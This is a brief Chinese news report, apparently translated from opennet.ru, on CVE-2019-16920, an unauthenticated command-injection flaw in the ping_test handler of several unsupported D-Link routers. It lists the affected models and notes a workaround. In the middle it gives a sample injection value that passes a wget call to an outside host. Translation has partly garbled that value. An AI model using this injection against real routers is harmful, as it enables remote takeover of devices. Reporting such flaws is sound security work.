D-Link 路由器中的可远程利用漏洞

在 D-Link 无线路由器中 已确定 危险的漏洞(CVE-2019–16920),它允许您通过向“ping_test”处理程序发送特殊请求来远程执行设备端的代码,无需身份验证即可访问。

有趣的是,根据固件开发人员的说法,“ping_test”调用只能在身份验证后执行,但实际上无论登录到 Web 界面如何,它在任何情况下都会被调用。特别是,当访问 apply_sec.cgi 脚本并传递“action=ping_test”参数时,脚本会重定向到身份验证页面,但同时执行与 ping_test 相关的操作。为了执行该代码,ping_test 本身使用了另一个漏洞,该漏洞调用 ping 实用程序而没有正确检查发送用于测试的 IP 地址的正确性。例如,要调用 wget 实用程序并将“echo 1234”命令的结果传输到外部主机,只需指定参数“ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://” test.test/?$(回显1234)”。

D-Link 路由器中的可远程利用漏洞

该漏洞已在以下型号中得到官方确认:

  • DIR-655 固件版本为 3.02b05 或更早版本;
  • DIR-866L 固件版本为 1.03b04 或更早版本;
  • DIR-1565 固件版本为 1.01 或更早版本;
  • DIR-652(未提供有关有问题的固件版本的信息)

这些型号的支持期已经到期,因此 D-Link 不会发布更新来消除漏洞,因此不建议使用它们,并建议更换新设备。作为一种安全解决方法,您可以将对 Web 界面的访问限制为仅受信任的 IP 地址。

后来发现该漏洞还存在 影响 型号 DIR-855L、DAP-1533、DIR-862L、DIR-615、DIR-835 和 DIR-825,发布更新的计划尚不清楚。

来源: opennet.ru

添加评论